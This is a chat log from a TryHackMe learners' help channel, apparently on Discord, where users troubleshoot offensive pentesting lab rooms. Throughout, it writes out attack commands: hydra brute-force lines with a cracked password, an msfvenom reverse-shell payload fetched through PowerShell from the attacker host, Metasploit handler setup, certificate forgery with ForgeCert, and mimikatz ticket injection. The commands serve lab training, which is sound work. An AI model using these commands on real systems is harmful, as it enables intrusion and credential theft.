what command did you use to download it from the FTP server?
Hi. In the last part of the Game Zone room, in order to gain a root shell in Metasploit (using the module exploit/unix/webapp/webmin_show_cgi_exec and payload cmd/unix/reverse), it was needed to change the parameter SSL to false. Does anyone know why?
The software isn't running on HTTPS
So you need to tell Metasploit not to talk HTTPS to it
Gave +1 Rep to @keen iris
Anyone who can help me troubleshoot why https://www.internal.thm/blog/wp-admin/ in the room Internal isn't loading?
If I complete this path and the PenTest+ preparation exam, will I know enough to pass the exam?
Hi guys, I am having a problem in the Brainstorm room for buffer overflow
I have tested chatserver.exe and the script runs perfectly on the local IP and I get a shell
when I change the script to my target machine IP I don't get a shell, very weird, any suggestion? I tried to restart the machine 2 times and it's still the same
nvm, it worked, it was the OpenVPN problem!! thank you guys
Which exam are you thinking about?
The PenTest+ lol
I don't think so. I think you need a lot more knowledge than what you can get from just completing this path and the pentest prep.
Having an issue with hydra in Skynet room. No matter what I set the failed login response to my results are all valid.
The log1.txt file has the correct password for milesdyson email account.
wait, I've done this room, I think I can help u
in this room u don't need hydra, it doesn't work, u need this
searchsploit -m php/webapps/25971.txt
anyone come across this problem? I think it is server side, but I'm not certain.
┌──(root㉿kali)-[/home/leigh/Downloads]
└─# telnet 10.10.129.25 3389
Trying 10.10.129.25...
telnet: Unable to connect to remote host: Connection timed out
┌──(root㉿kali)-[/home/leigh/Downloads]
└─# xfreerdp /u:admin /p:password /cert:ignore /v:10.10.129.25 /workarea
[11:02:45:378] [96039:96040] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[11:02:45:379] [96039:96040] [ERROR][com.freerdp.core] - failed to connect to 10.10.129.25
is your VPN connection good?
It's all good now, I found some code that fixed the issue:
sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn
yes, this is what I mean
Yeah, thanks, so all good. I didn't realise it was that initially, just the ovpn being wrong, till I actually read what was happening
it happened to me too last time
I used Burp Suite to breach the login screen. Hydra wasn't working for me like normal. My problem is I don't understand why hydra isn't working here. I've tested and researched on my own, no luck.
I think the syntax is wrong, can u please share so we can help u?
c
hydra -l milesdyson -P log1.txt 10.10.37.39 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:ERROR Unknown user or password incorrect."
It acts like the failed login response is incorrect. It shows the entire wordlist as valid passwords.
Anyone having issues trying to SSH to THMJMP1 in the Breaching Active Directory room? I can't even ping the host and I'm using the THM AttackBox
If I am not mistaken, your error message is wrong. When I get false positives on hydra http-post-form methods I try to change the error message.
I have a problem in the room Persisting Active Directory
Task 4, Persistence through Certificates
when I put in the code the terminal freezes, I think there is a bug, I tried it many times and I reset everything
C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123
└─# hydra -l milesdyson -P '/root/logs1.txt' 10.10.138.78 http-post-form "/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-24 12:12:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.138.78:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.138.78 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-24 12:12:37
host: 10.10.138.78 login: milesdyson password: cyborg007haloterminator
http://10.10.138.78/squirrelmail
did u update ur DNS?
I cannot continue my lab, something is wrong with this room!!!!
Yeah, I did.
systemctl restart NetworkManager
and after that try to nslookup and ping ur host
If you restart NetworkManager, you'll need to update the nameserver.
he has to put it in manually since he's doing the AD room
I have a question about the Relevant room: the victim OS is Windows 2016, why is EternalBlue not working? I know it is not the solution for this machine but I want to know the reason
Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.
Thank you for your help. 😁
Gave +1 Rep to @odd stone
I lost internet for a moment before I could finish that thought. That machine appears to have the patch applied to it, I have fever dreams occasionally of the mad scramble applying that update to a large number of servers in a short amount of time in my internship.
Anyone tried 'Internal' lately?
internal.thm/ isn't loading
I did open a ticket, thought I'd ask here too
anyone know why my nessus scan isn't getting results? I installed Nessus on my kali linux VM and ran a scan targeting the TryHackMe machine, and nothing is outputted.
😮 let me try that
Um I've entered the IP address, not the words internal.thm
It resolves to internal.thm and throws an error
I'll try and report back 🫡
Did you figure it out? I'm having the same problem (Nessus room - https://tryhackme.com/room/rpnessusredux) for both scans, basic and web.
Make sure you guys are connected to the TryHackMe VPN: try ping 10.10.10.10, or use ip addr and check tun0, it must be the same IP address shown on the TryHackMe page if you are connected
Remember to start nessusd.service using sudo systemctl start nessusd.service and in your browser go to https://127.0.0.1:8834 (127.0.0.1 is the loopback IP and 8834 is the default Nessus port)
and in the target you must add the target IP address, but first ping it to see if you can communicate with it
if the target machine IP isn't responding, try restarting it
if it is still not working, regenerate your .ovpn file or switch server
also, check if your firewall is blocking the connections (the Linux default firewall [ufw] configuration is to deny all incoming connections and allow all outgoing connections; check the status with sudo ufw status, you can allow or deny using sudo ufw allow/deny port/protocol)
as an example, when I was trying to send linpeas.sh (a privilege escalation bash script) to the target machine using python http.server:
I needed to allow connections on port 80 using the TCP protocol: sudo ufw allow 80/tcp
Is there an issue with the Alfredo box? The last meterpreter shell just won't pop up
ALSO (Nessus room) IS NOT WORKING FOR ME
Just lost an hour and a half because my PowerUp.ps1 wasn't working on the Steel Mountain machine. I had uploaded the file correctly, but instead of typing . .\PowerUp.ps1 (there's a space between the dots), I was typing it without the space. Just posting here in case someone has the same problem in the future when trying to run Invoke-AllChecks
Thank you - that did it for me! I probably had forgotten to connect to the vpn - I was able to run through the verification steps you listed this time, and that is handy.
Gave +1 Rep to @ornate crow
nice nice
anyone done Gatekeeper recently
?
I'm trying to crash the app but every script I use is not working
I'm thinking it's the Windows setup I'm using... using Windows 11
Windows 8 is not starting the application
anyone got a link to download Windows 7 or lower?
anyone here already done https://tryhackme.com/room/bufferoverflowprep ??
yup
I am stuck on oscp.exe - OVERFLOW1
I already got the flags, no problem with that. Just when I am injecting the payload into the executable it crashes
I believe it might be something to do with stack padding
uuuum, well, not sure there
for most of them shadow skipped making them run a shell
and just got the flags
not sure what the issue is if you are trying to get a shell but don't
might be because the pointer that you overwrite needs to be in reverse order in your exploit script
i.e. big-endian vs little-endian
I followed the program flow and the jump is alright. When I jump everything is ok, but then my code has "fstenv" line that breaks everything
maybe try adding some padding, i.e. NOP bytes, before your shellcode in the exploit script
I jump to the stack pointer and the stack is all filled up with my code, but right after the "fstenv" everything breaks and the stack gets messed up
very hard to figure out what is going wrong, so shadow is just guessing and trying to help
at least you can finish the room ¯\_(ツ)_/¯
lol, yep
this is right after the jump and after bypassing the NOPs for padding
and this is the code already broken
sorry, the resolution is crap
I did
is this path aka the OSCP learning path within THM?
yep.. and I found my problem, it was just Python syntax
Nice I am doing HackPark within that path right now
Hi everyone, I am stuck at Content Discovery, Task 2 - robots. The machine won't open after opening the AttackBox. I did wait for 5 minutes before clicking on it.
Hello everyone, I'm stuck at Steel Mountain privilege escalation, the script is not working on the target system, what could be the problem?
These are the pictures
I'm trying to get PowerUp.ps1 to load but it's coming up with errors
I've got it! thank you so much @hidden shoal
Gave +1 Rep to @hidden shoal
Hi everyone, not sure if I am in the right room. I am stuck at Content Discovery, Task 2 - robots. The machine won't open after opening the AttackBox. I did wait for 5 minutes before clicking on it.
I'm working my way through Internal right now, I have access to Jenkins and can run commands but none of the reverse shells I'm using are working. I can ping both the THM machine and myself but for some reason the shells aren't connecting. Am I on the right path? Do I even need a shell in Jenkins?
I've tried metasploit web delivery with bash and python and the common bash reverse shell. I found it though, didn't actually need the shell. Not a big fan of this CTF either, I spent a lot of time enumerating and trying things when the answer was actually just too easy
Hey everyone, I'm doing the Kenobi room. The second question of Task 1 is how many ports are open; it seems like the answer is set to accept only one digit, but my nmap report says there are 11 ports open. Any idea why this is happening?
I think you should use a different scan syntax, maybe -sS
Please, I'm stuck here, Steel Mountain privilege escalation. The problem is that the listener isn't picking up the payload for ASCService.exe, what can I do?
hey guys, has anybody had issues with the Alfred CTF on the Offensive Pentesting path? The machine seems to be down 15 minutes after starting it. I'm definitely connected via VPN, so what gives?
never mind, figured out the issue 🙂
I think, in my opinion, you must first stop the service before trying to overwrite it, then with a bit of luck you should get your reverse shell
Hi guys, is anyone else getting difficulties in this path? I hope I am not the only one 😔
To make this easier to find: Alfred meterpreter session is not valid
Hey, I'm having significant issues with the Alfred CTF, my meterpreter session keeps dying nearly instantly. Here's what I've tried so far:
(This is based on a walkthrough, which also did not work)
LHOST (=tun0)=10.10.212.70
RHOST=10.10.41.133
create payload using:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai EXITFUNC=process LHOST=10.10.212.70 LPORT=9001 -f exe -o revshell9001exit.exe
serve payload using: python3 -m http.server 8000
And executing the following through the Jenkins web app:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.212.70:8000/revshell9001exit.exe','revshell9001exit.exe')"
Following this, I set up the exploit/multi/handler using
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.212.70
set LPORT 9001
run
Then I start my reverse shell process through the jenkins web app using:
powershell Start-Process revshell9001exit.exe
However, this leads to the following output (see screenshot):
I can't post screenshots, hence I'm including the output as code:
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.212.70:9001
[*] Sending stage (175686 bytes) to 10.10.4.133
[-] Meterpreter session 1 is not valid and will be closed
[*] 10.10.4.133 - Meterpreter session 1 closed.
I'm likely missing something dumb here, though I've seen earlier reports of users' meterpreter sessions not connecting properly, though the workarounds for that don't work for me :(
edit: I got the web_delivery method working, although I'm still interested in why the above method did not work :(
I have the same problem here, can't figure out why. If you figure anything out please inform me
Working on the Alfred room. Anyone have a logic on how the route in was through the Windows Batch command? It's not documented anywhere in Exploit-DB that that's a vuln. Also, I managed to get https://www.exploit-db.com/exploits/49244 to work, but couldn't get any foothold from that. Is there a reason why https://www.exploit-db.com/exploits/49244 didn't work?
u need to log in and make it inside msfvenom and build it
Need some help if possible please. I am currently doing the Internal pentesting challenge, and I am at the stage of trying to brute force the Jenkins login. The problem I am running into is that the socket you have to set up to access the site runs on port 8080, so when I attempt to catch the page in Burp or ZAP it does not work. I have tried changing the proxy port of Burp and ZAP to a different port, however I get the issue in the image.
@covert scarab
:hammer: Blacko#4775 has been banned.
After slacking for a few months I got back in the mood and finished the Jr Penetration Tester path. I'll probably go with the Offensive Pentesting path next, but what are the differences with the Red Teaming path? What are both paths for? What do they prepare you for more, what is their difference in focus and goals for choosing either?
What's a non-msfvenom method?
Also, I'm using Burp Suite Intruder against the 'Skynet' box. I believe I'm getting rate-limited after 8 tries because everything is timing out. Is this a Burp restriction or THM's?
@proud silo in the Steel Mountain challenge, under Access and Escalation without Metasploit, the CVE script keeps saying there is an error? Any solution to this?
That's a bot
have you checked the script at the line & position where it errors out?
Oh! Thank you
Gave +1 Rep to @finite pivot
Yes, I checked for indentation errors. It's a Python script, which I'm good at
Guys, I'm really stuck on how to connect to the Active Directory network. I set up the DNS server and it didn't resolve THMDC.local. Anyone help!
Can you ping the DNS server?
no, but I think it's blocked, because I used nmap without ping and it says the host is up
Which room are you doing?
breaching active directory
Are you in the attackbox or VM
in the AttackBox it is working fine, but the problem is in the Kali VM
I'm solving the HackPark room
I also got the passwords via hydra but none of them are working
"The passwords" sounds to me like you're doing something wrong. You shouldn't have multiple
I got it, there was some problem in the query
but now I have another problem: I have uploaded the exploit, and when I'm trying to access the URL given in the exploit I'm getting this
anyone?
still here?
@eternal timber PM me and I'll help you, I was having a similar issue
I was working in the "Exploiting Active Directory" room and lost access suddenly. Tried with VPN, AttackBox and Kali after that, but no communication with the 10.200.60.0 network. Can someone please reset the room? Need only one vote.
Cannot ping the DC or any other machine from the AttackBox
well, you can place one reset vote every 30 mins.... also there are multiple networks with different subnets, at least you mentioned yours so people could reset it
Thanks
Gave +1 Rep to @vernal mason
Can anyone please help, getting this error "mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
- File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)
while importing TGS tickets using mimikatz
This is for the "Exploiting Kerberos Delegation" room
I am logged in as T2 Admin (t2_lawrence.lewis)
Buffer Overflow Prep, Task 2:
"Run the following command to generate a cyclic pattern of a length 400 bytes longer than the string that crashed the server (change the -l value to this):"
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Except there is no "metasploit-framework/tools/exploit/pattern_create.rb -l 600" in /usr/share
The writeups say to use
msf-pattern_create -l 2400
but that command cannot be found
What am I missing?
I can be reached here: bigdeal@w01fguard.com
Hi, I have a problem in the Steel Mountain room: at the last question of the second task, I have to copy-paste the flag user.txt. The problem is when I type "cat user.txt" in the meterpreter console, it shows the file content but there are two incorrect characters. When I copy-paste to THM, it looks like " \ufffd\ufffd ...". I see with Google it's a problem with Unicode. Can someone help me, because I am stuck at this step
Drop into a Windows shell with shell and run type user.txt
ok, thx
If I start the AttackBox from the room Breaching Active Directory then it's supposed to connect me to the AD network automatically but it's not doing that, what am I missing?
There isn't, but you can download it directly from GitHub, see below:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/tools/exploit/pattern_create.rb
chmod +x pattern_create.rb
Then just run the following on your AttackBox, this is what I did:
./pattern_create.rb -l 2400 (or whatever length you have)
did you run the DNS setup command?
Any guess why this is showing this error? It's the Offensive Pentesting Steel Mountain room, without Metasploit, cve-2014-6287.py. I started a Python HTTP server to serve nc.exe and then modified the code with lhost and port set and an nc listener on the attacker machine; when I ran this .py file it showed me this error.
it's interpreting \U at the start of the vbs string as unicode https://bobbyhadz.com/blog/python-unicode-error-unicodeescape-codec-cant-decode-bytes#the-3-possible-solutions-to-the-error has a few different ways to fix it
It's not that, I don't even have that interface, someone recommended stopping the AttackBox, leaving the room, coming back to the room, and starting the AttackBox again... we'll see if it helps, I hope so tho lol
it doesn't show a breachad interface when you check the ipconfig? 🤔 yeah I'd try restarting the attackbox and hope that works. I've just double checked from my attackbox and it was working fine 🤞
*grumbles about #hackpark PostView exploit not working.*
And suddenly, there it is x'D
I'm trying to get my Kali VM connected to the Breaching AD network, but OpenVPN just gives me this error message: "Error: problem with tun vs. tap setting". Anyone know what to do?
You need to edit the VPN config; where it says
dev breachad, change it to dev tun
Thank you.
Gave +1 Rep to @finite pivot
hi
Friends, I downloaded the network OpenVPN config in the AD room but the .ovpn doesn't work on my physical machine. Does anyone else have problems with this? Is there a solution?
If you want you can DM me and we can try to solve it. 😊
response message marle
I sent you the problem privately, I couldn't solve it, I wonder if it's caused by your system, really.
Responding you here also, to state out publicly that I am not staff, but a subscribed user / customer on THM. I do not mean to implicate being a staff person in any way. Apologies also here for neglecting to mention that I am only a regular user. :)
@lavish trail we solved the problem, bro, this place is nice, I'll use it actively from now on
Do you mean your config file .ovpn? What's the error message?
English only on this discord server please
This server is English only, please
i see how it is @dense gate , steal that valor while I'm at work 🙂
Keep working, I'll handle it 😄
I am on Task 4 in Breaching AD. When I set up my rogue LDAP server it doesn't give me the option to choose MDB for my database. Also, I follow all the steps, and when I check if my rogue LDAP server's configuration has been applied, I just get: dn:
Never mind, I got the password. I just can't read.
Hey guys, I'm doing HackPark rn, got a meterpreter session and am trying to enumerate the system with winPEAS. Is it normal that it sometimes hangs for half a minute or so?
Good evening
guys, anyone know how to make Burp Suite catch requests to localhost?
issue in the Internal room, Jenkins service
I changed:
about:config
network.proxy.allow_hijacking_localhost to True
but it's still not working
Ugh, too sleepy for buffer overflow techniques. *falls asleep*
it's not in PWK anymore, sadly
It's in PWK, but not guaranteed in the exam, no?
they removed it from the exam if I'm not mistaken
The exam is OSCP, the course is PWK, so it's still in PWK
it's also removed from the course
I'm probably really late to the party, anyone else having issues with Retro? The intended path isn't working as expected ||I'm talking about CVE-2019-1388, and using the hhupd.exe in the recycle bin|| I know this isn't the only path, but it's the most obvious one.
Eventually I managed to find another way, but I was wondering if anyone else ran into issues with ||trying to get into IE and saving the file to be able to launch it in cmd, I couldn't even get IE to show up as an application|| anyway, just putting that out there.
On another note ||I learned how to use Juicy Potato properly, I've been meaning to look into that, just didn't have the chance yet||
hey guys
anybody else had this problem before?
I've concluded these topics, but it looks like I still need to finish something...
it's not possible to share a print here 🥲
this one
when I come back to the dashboard, "Vulnversity" is not completed yet
Refresh your webpage, clear your cookies, also I completed that one as well and I'm having the same issue, might just be a temporary bug but it shouldn't prevent you from printing your certificate at the end of the learning path, everything is okay on the back-end.
thx ✌️
Gave +1 Rep to @novel moon
In Enumerating AD Task2 How do I start MS SQL Studio from that command prompt?
Can anyone help me in the Vulnversity room?
I didn't find the answer to the last question
You can list all the SUID files and then look at GTFOBins if there is a binary amongst the found ones which can be abused. :)
I have a bug, I think
I completed Vulnversity a few weeks ago, but today it's not terminated
but I have all the answers
It's a known issue, they're working on it #1092490706385383524
thx
Same problem for me
#1092490706385383524 they're working on it
Thanks a lot 👍🏻
Aside from the Offensive training paths are there some other rooms which you guys might recommend as practice for the OSCP certification? I'd like to go through a bunch before the exam
Hey everyone, does someone know why, in Steel Mountain, it doesn't connect to my nc listener?
It downloads nc.exe, but when I run it a second time, it doesn't connect to my listener. I've tried it with both port 4444 and 443
Is it a binary file? Try to discover the port number using Radare2 or gdb.
It's probably that the port isn't correct
Yes, ncat.exe is a binary file and the link to it was provided by the author. Never worked with binary files before or used the tools you mentioned, but I'll try to figure it out! Thanks for the input!
Their advice is a little misleading, as it's ncat which is well known. Just have a look at what port it's meant to send the shell to, within the script
Hey Coy, could you tell me how you managed to get it to work? I'm having the exact same problem at the moment and I'm super confused, why the connection dies instantly....
I used the web_delivery method
That worked. Thanks! Did you ever find out why the standard way didn't work?
Gave +1 Rep to @undone flint
I just ran into this myself, the CVE isn't working
Use ||juicy potato||, that worked for me
Cheers. I eventually found a CVE from 2017 that worked
Is the learning path valuable if we want to pass the OSCP?
Or not valuable enough, and it's better to work on the OSCP course only?
I think it is valuable, especially the buffer overflow section, it's pretty much what you would do on an exam
Thank you @fleet wedge 🙏
Gave +1 Rep to @novel moon
They dropped buffer overflow from the new OSCP. But as 🤑 as the OSCP is, I would think it's worth doing this learning path first to have more experience before you jump into the limited OSCP lab time.
What? They dropped buffer overflows? You know how long I've been studying for that
Yep, they dropped buffer overflow from their new updated class material, so they dropped that machine from the exam https://help.offsec.com/hc/en-us/articles/12483872278932-PEN-200-2023-FAQ "The OSCP exam is not changing as part of the update, with the exception of the removal of the independent Buffer Overflow machine from the exam."
may you one day use your buffer skills out in the real world and feel vindicated
Can someone help me?!
I'm stuck at the Lateral Movement room in Task 5
I used mimikatz to take the users' NTLM hash.
According to the first screenshot from the website I should receive a shell. I receive it, but there is no flag.exe on the desktop to finish Task 5
I have a rather embarrassing question: I'm doing Skynet right now and I got the password, which I want to use to log into the SMB client, but I simply can't type in the characters ^ and ` in my Linux machine. I've been trying all kinds of things for more than an hour and feel like I'm wasting so much time...
I've also tried pasting it when it asks for the PW, but that doesn't seem to work either
Btw, I've got a German keyboard
Supposedly the characters are here on a German keyboard layout
Have you tried ctrl+shift+v for pasting
Hi @dense mist , that's right, the characters are there, and I can type them here without problems ^^ ``, but on the VM it simply doesn't work and I can't paste the password with ctrl+shift+v, because it doesn't accept it when pasting it :/
Does the VM perhaps use a different layout?
I also changed the keyboard settings on the linux machine to fit my layout
Ah okay, that answers that
Does it paste it into the command line at all, or does it not work no matter what?
Cause if it lets you do that, you could specify it in the command: -U=user%password
I actually tried to use "smbget" instead of logging in, and there it let me paste the password. So I've got the files now. Still super weird why it doesn't let me type those characters...
I had the same exact issue, and what I found was that the solution was to double check how I dumped the sam and system files. It turns out I saved the sam-reg as both the sam and system and that was why it wasn't working
I double checked the way I saved the sam-reg and system-reg and then it worked. Turns out I was saving sam-reg to both sam and system
Hello everyone, I'm doing the Hack Park module. I have to force the login of the website with Hydra, but my command doesn't work. If someone can explain to me what's wrong
I had the same issue but with another language. What finally got it working was using keyboard model Macbook/Macbook Pro as keyboard model, then language(macintosh) as layout. I'm using Kali inside Parallels Desktop on Mac
Will try that out, thanks!
Gave +1 Rep to @restive dock
Hi, can someone tell me what the OS in the video in the Hack Park room is?
It's just Kali Linux
OK, he has a custom Kali
Pretty sure it's just an older version, the video is 3+ years old
He just has a beautiful Kali, not like mine
What path should I pursue next, the Red Teaming or Offensive Pentest? I just finished the Jr Pentest
Offensive pathway
After offensive then the red teaming
For Task 6 of Hacking with Powershell, the question asks: "How many open ports did you find between 130 and 140 (inclusive of those two)?" Based on my script, it would seem to me as though the answer would be 1, since only port 135 has a TCP Connection Succeed True. However, the answer is 11, which appears to be because there are 11 ports inclusive of both 130 and 140 (i.e. the 11 ports are 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140). I don't understand why all of these ports are considered "open." Are they "open" just because PingSucceeded is True, even though for all of them except port 135, TCPTestSucceeded is False?
I am at the Overpass2hacked room, and tried to answer the question "Using the fasttrack wordlist, how many of the system passwords were crackable?". I used john and the wordlist mentioned, but I only find 2 passwords. Apparently the correct answer is 4. I also checked some writeups but I do not find what I am doing wrong. Anybody has an idea?
Hi, I have a problem in the HackPark room: I have generated an exe with msfvenom to do a reverse shell. I have already downloaded it on the Windows machine, and set my listener in Metasploit
but when I run my exe file on the Windows machine, it works, but my listener shows an error:
[*] Started reverse TCP handler on 10.10.204.106:9999
[*] Sending stage (175686 bytes) to 10.10.59.112
[-] Meterpreter session 1 is not valid and will be closed
[*] 10.10.59.112 - Meterpreter session 1 closed.
and if I retry, it's always the same problem
Can someone help me?
@drowsy zinc Have you (double) checked that the payload certainly is of same type as the generated exec has? :)
I created a shell with this command: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
and I replaced LHOST and LPORT with my IP and 9999
In other rooms, it always works 🤷♂️
Seems that you are not using Meterpreter as payload, though it is configured for the listener. If I look at this correctly.
The payload you used to generate the executable (windows/x64/shell_reverse_tcp) isn't the same as Meterpreter, which you have told the listener that the payload is. (I'm tired but 95% confident that it is not). :)
oh ok
So I have to create another exe file with msfvenom?
Or change the payload in msfconsole?
Well, here you have two options:
- If you're happy with a basic reverse shell (which is not Meterpreter), you can "let the listener know" that you're using payload windows/x64/shell_reverse_tcp -> That way the listener will catch the arriving shell and treat it correctly (not trying to force the Meterpreter main payload through the connection).
- The other way: you can generate a new exe file using a payload that matches the listener.
If you really want Meterpreter, go with option 2. If you're comfortable with a trad reverse shell, go with option 1. :)
OK, thx (sorry for my bad English, I'm French 😅)
You're welcome, do say if you can't get it working. And to me your english seems fine! :) Magnifique!
thx
@drowsy zinc Sure, happy to help. :)
I'm doing the Relevant task now. After scanning with nmap, port 49663 doesn't show up in my scans. I'm only just finding out after reading walkthroughs. Anyone experienced this???
What was your command when you ran your scan? And what tool did you use?
nmap -sC -sV -p- <ip address>
That's odd. It should have been captured. Did you try to run your scan again to see if it will be captured?
Don’t quite get you
Sometimes ports take time to open because the service on said port is slow to start
Sorry, I meant again
I have run the scan 5 times or more
Try restarting the target machine and wait 15 mins for it to start fully
then rescan the new machine
Will try that again
Anyway, a -p- port scan with nmap will take a while, as there are after all 65,000+ ports
Yeah, I'm used to that... about 800 secs or more
Sometimes 1000 secs
For scanning all the TCP ports, try using rustscan. Doesn't take more than 1-2 mins to find everything open. Service and script scans after that take longer.
*sigh* rustscan is not needed if you use the right nmap options
My silly mistake was not running the scan with root privilege. I just tried sudo nmap ....... and boom, it popped up.
thanks for the suggestions.
Gave +1 Rep to @vernal mason
rustscan is basically just increasing the min rate and some other smaller options to scan faster
Been having sleepless nights because of this buffer overflow room
Can't get mona.py to work on my Windows with Immunity Debugger
I already have mona in the pycommands folder, and when I try typing the mona command it says "pycommands: error importing module"
Any help will be appreciated
For the Mr Robot box (extra credit section of the Offensive Pentesting learning path), Hydra seems to be a bit of a mess to get through. Using it first to get the username and then, once the username is locked, it seems to not really give the password using the fsocity.dic as a list
It looks like I am not the only one having this issue of it taking ridiculously long. I have what I think is the same as what they use in the walkthrough and still a 75hr wait for the password. I decided to just use the password result told to us in the walkthrough and solve the rest of the box because 75 hours (if it was going to take that long, unless I'm doing something completely wrong) seems like it's not going to work too well lol
is there something big I missed?
I'm trying to copy the ma.db file in Task 7 of Breaching AD and I'm getting this error after using the password. Don't know what I'm doing wrong
See #1092490706385383524 around the Vulnversity and path cert issue
You probably just have to go into Vulnversity and answer a single unanswered question, if the fix is anything to think about
Thank you buddy
Hi, is the Offensive Path still valid if you are preparing for OSCP? Cause they have removed Buffer Overflow from the exam?
Doesn't mean the rest of the path is invalid
Yes, I will be doing the other labs.
also does not mean that knowledge of buffer overflows has no use anymore
Hi guys and ladies. Going through the Vulnversity tasks of the path and found a strange answer to the question on the task "Locating directories using Gobuster". The answer is || internal || but it seems impossible to determine from the Gobuster output. I rather think that the answer should be || server-status || regarding the different status code of the answer. Can someone explain why the correct answer was like that?
server-status is a standard Apache path that always exists but is usually configured to be inaccessible to you. internal however does sound spicy, and the 301 code is not bad, it just tells you the site moved (probably from /internal to /internal/)
It's like finding a directory called "secret" but a bit less obvious
Of course a server status page could also have some interesting vulnerabilities especially regarding logs or command injection, it just happened to not be the case in this example and the internal path looks like a low hanging fruit
The question was "what directory has an upload form page?" (expecting RCE in the next task) and I'm not sure the Gobuster output answered it. Maybe I didn't finish the exercise correctly?
Gobuster itself would not answer such a question for you, it just gives you some websites you can manually browse and check out
Thank you
What is the problem with this?
Invoke-AllChecks isn't working
Can someone explain?
You didn't use the previous command correctly
The "." operator in PowerShell means "include this file"; you basically called a functionality without including it first
Using "." for that is not very intuitive if you ask me, but oh well
Thank you
Gave +1 Rep to @silk vale
Any of y'all use Evil-WinRM often?
Yup
How exactly do you download/upload with this thing? I've been trying to use the commands and I'm not sure where in the hell the files get downloaded or uploaded
Providing absolute paths and nothing happens
Just wondering if there's some hidden default directory for that
Yeah, it's " . .\ ", isn't it, from what I recall?
Wondering so I don't make that mistake
Just figured out it's probably because I lack permissions to do it
Man, does Evil-WinRM not show that
Hi guys and ladies. Going through Vulnversity still, just finished the task about compromising the server. The strange part is that I got 200 OK from the server disregarding the extension of the shell I'd like to upload as payload. Maybe it's OK, not so bad anyway, but there are more strange things. The strangest thing is that the path to the uploaded file is provided in the task. It doesn't seem close to the real world. So how can I guess the file location where the shell will be loaded and can be accessed?
I think you'd have to hope to find the right folder doing recon by using tools like ffuf, gobuster, etc. to look for what folders and files are accessible. I had the same thought after I did it, and I managed to find the uploads folder location using a dirb scan (dirb http://IP:port /usr/share/wordlists/dirb/big.txt -R) and setting the -R recursive flag so that when it finds a directory it then checks for subdirectories as well.
@silk vale, if I understand correctly, said that Gobuster isn't suitable for URL identification, so now I'm not sure about Gobuster.
Actually, now that I think of it, Gobuster wouldn't have worked here because it doesn't search recursively.
If we drop the recursion issue and assume that the site has only one level of folders, will Gobuster help?
It should; it uses brute-force testing to try to find available files and folders. Personally, these tools are all ones I need more practice with. I often either get loads of errors (ffuf) or find them really slow (dirbuster). gobuster and ffuf seem to have better reputations for speed, but I haven't used any of them extensively enough to have my own opinion on that.
Thank you @indigo ember
Gave +1 Rep to @indigo ember
Hi, I need help for the Skynet room for the second question: What is the hidden directory? I have run gobuster and I've found /squirrelmail, but it's not the right answer. Can someone tell me why?
OK, I have found the answer, sorry for disturbing
Hi guys and ladies.
Seems I found a useless step in the Blue room. It was proposed to change the shell to Meterpreter after using the exploit, but in fact the default shell for EternalBlue is Meterpreter now. So we have a useless step in this room.
Hi, I have a question. I am doing the Linux priv esc path, I am in the NFS section. I got the idea and logic: I can mount the NFS on the attacker machine, write C code that runs bash with root privs and build it. But can I write a bash script to priv esc too? It doesn't work with root privs when I try. I have tried writing sudoers files for the karen username or copying the bash binary and giving it SUID.
Is there an example PoC priv esc for the NFS section which is written as a bash script, not compiled C code or msfvenom?
> I have tried writing sudoers files for the karen username or copying the bash binary and giving it SUID.
That would work
> But can I write a bash script to priv esc too?
That would not. SUID doesn't work for scripts, the interpreter would need SUID
bro, thank you. This was the answer i was looking for. "Suid doesn't work for scripts" I am relieved now 🙂
Gave +1 Rep to @keen iris
Hi, quick question, during the Kenobi box I got this error when I try to mount the point:
mount <box_ip>:/var /mnt/kenobiNFS
mount.nfs: access denied by server while mounting <box_ip>:/var
Has anyone already got this message? Did I miss a step?
IDK if it's useful but:
This command is sent from a WSL Kali (my VPN is connected on my Windows machine with a proxy port).
Use sudo
Already tried...
Hi, I am doing the Alfred box. So, instead of using Metasploit I am doing the privilege escalation using the methods taught in Junior path.
The current user has SeImpersonatePrivilege (Impersonate a client after authentication) Enabled, but now when I use RogueWinRM.exe it is giving an error. Any idea what I am doing wrong?
This is the output
